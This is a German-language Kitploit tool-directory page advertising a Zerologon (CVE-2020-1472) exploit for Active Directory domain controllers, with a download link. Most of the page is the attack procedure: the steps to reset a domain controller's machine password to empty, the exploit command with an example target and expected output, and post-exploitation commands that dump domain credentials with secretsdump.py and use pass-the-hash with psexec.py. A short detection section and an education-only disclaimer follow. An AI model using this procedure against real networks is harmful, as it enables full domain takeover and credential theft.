Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
ZeroLogon-PoC-DC-Pwn — Zerologon (CVE-2020-1472) Proof-of-Concept-Anwendung - Werkzeug zur Ausnutzung einer kritischen Active Directory-Sicherheitslücke. | Kitploit
Tools/GitHubGitHub/mods20hh/zerologon-poc-dc-pwn
Privilege EscalationPasswortangriffeSchwachstellenanalyseExploitationPost-ExploitationPenetrationstestsPapers & ForschungLernen & BildungRed Teaming
GitHubmods20hh/zerologon-poc-dc-pwn

ZeroLogon-PoC-DC-Pwn

Zerologon (CVE-2020-1472) Proof-of-Concept-Anwendung - Werkzeug zur Ausnutzung einer kritischen Active Directory-Sicherheitslücke.

4vor 5 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen

Zerologon (CVE-2020-1472)

Übersicht

Dieses Projekt ist eine Implementierung der Zerologon-Sicherheitslücke (CVE-2020-1472), einer der kritischsten Active Directory-Sicherheitslücken. Diese Schwachstelle ermöglicht es einem nicht authentifizierten Angreifer, die gesamte Active Directory-Domäne zu gefährden, indem das Computerkontopasswort des Domänencontrollers zurückgesetzt wird.

CVSS Score: 10.0 (Kritisch)

Was ist Zerologon?

Zerologon ist ein kryptografischer Fehler im Netlogon Remote Protocol (MS-NRPC) von Microsoft. Die Sicherheitslücke besteht darin, wie Netlogon die AES-CFB8-Verschlüsselung mit einem fest codierten Initialisierungsvektor (IV) von Null verwendet.

Technische Zusammenfassung:

  • Das Netlogon-Protokoll verwendet einen Challenge-Response-Authentifizierungsmechanismus
  • Aufgrund einer fehlerhaften kryptografischen Implementierung hat eine Challenge aus lauter Nullen eine Wahrscheinlichkeit von 1/256, eine gültige Authentifizierung zu erzeugen
  • Ein Angreifer kann etwa 2000 Authentifizierungsversuche senden, um diesen Fehler zuverlässig auszunutzen
  • Nach erfolgreicher Authentifizierung kann der Angreifer das Computerkontopasswort des Domänencontrollers auf einen bekannten Wert (leerer Hash) zurücksetzen

Funktionsweise

root@kitploit:~
1. Target Selection
   └─> Identify Domain Controller (FQDN, NetBIOS name, machine account)

2. Challenge Phase (I_NetServerReqChallenge)
   └─> Send all-zero client challenge (0x0000000000000000)
   └─> Receive server challenge

3. Authentication Phase (I_NetServerAuthenticate2)
   └─> Attempt authentication with null credentials
   └─> Repeat until successful (~1/256 success rate per attempt)

4. Password Reset Phase (I_NetServerPasswordSet2)
   └─> Reset DC machine account password to empty
   └─> New NT hash: 31d6cfe0d16ae931b73c59d7e0c089c0 (empty password)

5. Post-Exploitation
   └─> Use Pass-the-Hash with empty credentials
   └─> Full domain compromise achieved

Erstellen des Projekts

Voraussetzungen

  • Windows-Entwicklungsumgebung (Windows 10/11)
  • Visual Studio 2022
  • Windows SDK

Kompilierung

Mit Visual Studio:

root@kitploit:~
1. Open Visual Studio
2. Select **Build Solution** from the **Build** menu.

Verwendung

root@kitploit:~
Zerologon.exe <DC_FQDN> <DC_NetBIOS_Name> <Machine_Account_Name>

Beispiel:

root@kitploit:~
Zerologon.exe DC01.corp.example.com DC01 DC01$

Parameter:

  • DC_FQDN: Vollqualifizierter Domänenname des Ziel-Domänencontrollers
  • DC_NetBIOS_Name: NetBIOS-Name des DC (normalerweise der Hostname)
  • Machine_Account_Name: Name des Computerkontos (muss mit $ enden)

Erwartete Ausgabe:

Erfolgreiche Ausnutzung:

root@kitploit:~
[+] Targeting Domain Controller:
    FQDN           : DC01.corp.example.com
    NetBIOS Name   : DC01
    Machine Account: DC01$

[+] SUCCESS: Machine account password reset to empty!
[+] Now use Pass-the-Hash with:
      .\DC01$:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
[+] Then run: secretsdump.py -just-dc <domain>/<dc_account>@<dc_ip>

Fehlgeschlagene Ausnutzung (gepatchtes System):

root@kitploit:~
[-] Attack failed after 2000 attempts. Target likely patched.

Nach der Ausnutzung

Nach erfolgreichem Zurücksetzen des DC-Passworts können Sie:

  1. Domänenanmeldedaten auslesen:
root@kitploit:~
secretsdump.py -no-pass -just-dc 'DOMAIN/DC01$'@192.168.1.10
  1. Pass-the-Hash-Authentifizierung:
root@kitploit:~
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 'DOMAIN/DC01$'@DC01

Erkennung

Netzwerkbasierte Erkennung:

  • Mehrere fehlgeschlagene Netlogon-Authentifizierungsversuche von einer einzigen Quelle
  • Ungewöhnliche Muster im MS-NRPC-Verkehr
  • IDS/IPS-Signaturen für Zerologon-Ausnutzung

Protokollbasierte Erkennung:

root@kitploit:~
Event Viewer → Windows Logs → System
- Event ID 5827: Multiple password validation failures
- Event ID 5829: Secure channel reset

SIEM-Abfragen:

root@kitploit:~
source="WinEventLog:System" EventCode=5827 OR EventCode=5829
| stats count by Computer, SourceIP
| where count > 100

Haftungsausschluss

Dieses Tool wird ausschließlich für Bildungszwecke und autorisierte Sicherheitsforschung bereitgestellt.

Der Autor übernimmt KEINE Verantwortung für den Missbrauch dieses Codes.

Referenzen

Offizielle Ressourcen:

  • CVE-2020-1472 - NIST
  • Microsoft-Sicherheitshinweis
  • Secura-Forschungspapier

Technische Analyse:

  • Microsoft Netlogon-Protokollspezifikation
  • Technische Tiefenanalyse zu Zerologon

Werkzeuge:

  • Impacket Toolkit – Für die Nachbereitung
  • Mimikatz – Extraktion von Anmeldedaten

Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert. Weitere Informationen finden Sie in der LICENSE-Datei.

Tool herunterladen